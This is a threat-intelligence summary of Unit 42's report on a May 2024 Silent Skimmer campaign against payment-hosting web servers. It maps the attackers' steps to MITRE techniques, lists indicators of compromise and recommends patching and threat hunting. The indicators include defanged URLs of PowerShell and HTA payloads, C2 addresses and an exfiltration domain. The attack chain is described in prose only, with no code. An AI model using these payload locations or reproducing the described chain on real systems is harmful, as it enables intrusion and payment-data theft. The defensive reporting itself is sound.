Keypoints
- Unit 42 observed a resurgence of the Silent Skimmer campaign in May 2024 targeting payment infrastructure.
- The adversary gained initial access by exploiting Telerik UI vulnerabilities (CVE-2017-11317 and CVE-2019-18935).
- Attackers deployed web shells and PowerShell reverse shells and used tunneling/reverse-proxy tools (Fuso, FRP) to maintain access.
- Post-exploitation tools included GodPotato for privilege escalation, a RingQ loader to reflectively load payloads, and Cobalt Strike for further activity.
- The group used mixed-mode .NET assemblies and MSHTA/LOLbins to evade analysis and execute remote HTA/PowerShell payloads.
- A compiled Python executable with hard-coded credentials was used to dump payment data from a victim database to a CSV for exfiltration.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used Telerik UI vulnerabilities to gain initial access (‘The threat actor gained an initial foothold on the servers by exploiting a couple of one-day Telerik user interface (UI) vulnerabilities.’)
- [T1203] Exploitation for Defense Evasion/Execution – Executed malicious scripts and binaries via web shells and PowerShell (‘Following the vulnerabilities’ exploitation, the attacker executed multiple reconnaissance commands and gained persistence.’)
- [T1059] Command and Scripting Interpreter (Persistence via scripts) – Installed and used web shells and reverse shells to maintain access (‘The attacker uploaded multiple web shells’ and ‘dropped and executed multiple reverse shells’).
- [T1068] Exploitation for Privilege Escalation – Leveraged GodPotato to elevate privileges (‘We observed the attacker using GodPotato for privilege escalation.’)
- [T1140] Deobfuscate/Decode Files or Information (Defense Evasion) – Used mixed-mode assemblies to hide native code inside .NET binaries to hinder analysis (‘mixed-mode assemblies were used to embed native C++ code within a .NET binary… make the analysis process more difficult’).
- [T1003] Credential Dumping – Dumped payment information via a compiled Python script connecting to the victim database (‘the threat actor used a compiled Python script… dump payment information to a .csv file’).
- [T1071] Application Layer Protocol (Command and Control) – Established C2 connectivity via reverse shells and HTA/PowerShell payloads hosted at C2 addresses (‘The IP address in the URL was also used as the command and control (C2) IP address for the reverse shell.’)
Indicators of Compromise
- [SHA256] Malware and tool hashes – 55271d94eb3c95bb6a1965d44bade5ecef5ff610e87133f169e602eb94c39d6b (RingQ Loader), 12508b830149c2d84f2c80947e78218128d16a834c8d0695068f3e773ac62ef9 (GodPotato), and ~30 more hashes.
- [IP address] Command-and-control hosts – 48[.]218.138.60 (hosting GodPotato payloads), 172[.]86.96.245 (MSHTA/HTA hosting), and other C2 IPs listed for this campaign.
- [URL] Payload drop locations – http://20.222.194[.]41/SecurityHealthSystray.hta (MSHTA payload), http://13.78.113[.]103/One.ps1 (PowerShell payload).
- [Domain / FQDN] Exfiltration / connectivity checks – nigntboxcdn[.]com used for exfiltration and f9e5e09788.ipv6.1433.eu.org for connectivity checks.
- [File names / scripts] Script artifacts – 129-80.hta (HTA reverse shell script), One.ps1 / logtest.ps1 (PowerShell reverse shells).
In May 2024 Unit 42 tracked a renewed Silent Skimmer campaign that targeted web servers hosting payment systems by exploiting known Telerik UI flaws (CVE-2017-11317 and CVE-2019-18935). After gaining initial access, the actor uploaded multiple web shells and deployed PowerShell-based reverse shells and tunneling tools (Fuso, FRP) to expose internal servers and maintain persistent remote access.
The attackers used a varied toolset: GodPotato for privilege escalation, RingQ as a reflectively-loading loader (sometimes masquerading as legitimate software), and mixed-mode .NET/C++ assemblies to hide native payloads and complicate analysis. They also used MSHTA and LOLBins to proxy execution of remote HTA/PowerShell payloads and later dropped a compiled Python executable (packed with PyInstaller) that connected to internal databases with hard-coded credentials to dump payment records into CSV files.
Unit 42 observed numerous C2 IPs, URLs, and file hashes linked to the campaign and noted overlaps with prior Silent Skimmer activity reported by other vendors. The main operational differences this time were the use of a compiled Python dumper for payment data and the RingQ loader; otherwise the group’s TTPs remain aligned with previous web-facing exploitation and web shell-based persistence.
Recommendations: immediately identify and patch internet-facing Telerik UI instances, hunt for web shells, MSHTA/PowerShell executions, and the listed C2 indicators, and engage incident response if compromise is suspected. Rapid patching and monitoring of known CVEs remain critical to block this financially motivated cluster.
Read more: https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/